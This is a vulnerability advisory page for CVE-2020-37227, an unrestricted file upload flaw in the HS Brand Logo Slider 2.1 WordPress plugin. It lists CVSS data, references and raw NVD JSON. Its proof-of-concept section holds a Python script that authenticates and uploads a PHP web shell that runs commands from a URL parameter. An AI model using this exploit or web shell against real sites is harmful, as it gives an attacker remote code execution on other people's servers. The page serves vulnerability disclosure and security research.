CVE-2020-37227

Description

HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability that allows authenticated users to bypass client-side file extension validation by uploading arbitrary files. Attackers can intercept upload requests to the logoupload parameter in the admin interface and rename files to executable extensions .php to achieve remote code execution.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HS Brand Logo Slider 2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = 'http://example.com/wp-admin/admin-ajax.php'
login_url = 'http://example.com/wp-login.php'

# Credentials
username = 'attacker'
password = 'password'

# 1. Authenticate to get cookies
session = requests.Session()
payload = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': 'http://example.com/wp-admin/'
}
session.post(login_url, data=payload)

# 2. Prepare the malicious file (PHP shell)
php_code = '<?php system($_GET["cmd"]); ?>'
files = {
    # Bypass client-side check by sending correct Content-Type, but server accepts .php
    'logoupload': ('shell.php', php_code, 'application/octet-stream')
}

# 3. Send the upload request (Action might differ based on plugin hook)
data = {
    'action': 'hs_logo_upload_action' # Example action name, real name depends on plugin
}

response = session.post(target_url, files=files, data=data)

if response.status_code == 200:
    print("File uploaded successfully.")
    print("Check shell at: http://example.com/wp-content/uploads/shell.php?cmd=whoami")
else:
    print("Upload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37227
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37227
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37227/
[4] VulDB https://vuldb.com/cve/CVE-2020-37227
[5] https://ms.wordpress.org/plugins/hs-brand-logo-slider/
[6] https://www.exploit-db.com/exploits/48913
[7] https://www.heliossolutions.co/
[8] https://www.vulncheck.com/advisories/wordpress-plugin-hs-brand-logo-slider-unrestricted-file-upload

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37227", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:17.713", "lastModified": "2026-05-18T17:32:04.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability that allows authenticated users to bypass client-side file extension validation by uploading arbitrary files. Attackers can intercept upload requests to the logoupload parameter in the admin interface and rename files to executable extensions .php to achieve remote code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://ms.wordpress.org/plugins/hs-brand-logo-slider/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48913", "source": "[email protected]"}, {"url": "https://www.heliossolutions.co/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-hs-brand-logo-slider-unrestricted-file-upload", "source": "[email protected]"}]}}